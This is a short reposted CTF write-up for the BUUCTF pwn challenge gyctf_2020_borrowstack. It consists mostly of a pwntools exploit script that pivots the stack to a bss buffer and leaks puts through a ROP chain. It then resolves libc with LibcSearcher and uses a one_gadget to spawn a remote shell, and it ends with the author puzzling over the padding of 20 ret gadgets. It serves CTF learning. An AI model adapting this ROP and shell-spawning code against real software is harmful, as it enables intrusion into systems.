[BUUCTF-pwn]——gyctf_2020_borrowstack

exploit

from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',28602) #p = process('./gyctf_2020_borrowstack') elf = ELF('./gyctf_2020_borrowstack') #libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #gdb.attach(p, 'b *0x0000000000400676') context.log_level = 'debug' puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] main = elf.symbols['main'] bank = 0x0000000000601080 leave_ret = 0x0000000000400699 pop_rdi = 0x0000000000400703 payload = 'a' * 0x60 + p64(bank) + p64(leave_ret) p.recvline() p.send(payload) payload1 = p64(0x00000000004004c9)*20 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)p.sendafter('now!\n',payload1)puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))log.success("puts_addr -----> :" + hex(puts_addr))libc = LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") info("libc_base -----> " + hex(libc_base)) sys_addr = libc_base + libc.dump("system") binsh = libc_base + libc.dump("str_bin_sh") one_gadget=libc_base+0x4526a payload = 'a' * 0x60 + p64(bank) + p64(one_gadget) p.sendafter('Tell me what you want\n',payload) #payload1 = p64(0x00000000004004c9)*20 + p64(pop_rdi) + p64(binsh) + p64(sys_addr) + p64(main)p.sendafter('now!\n','a') p.interactive()

啊啊啊啊啊啊啊， 為什么要加20個ret呀孩子不清楚孩子想知道。
這河里嘛，這不合理！！！

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——gyctf_2020_borrowstack的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。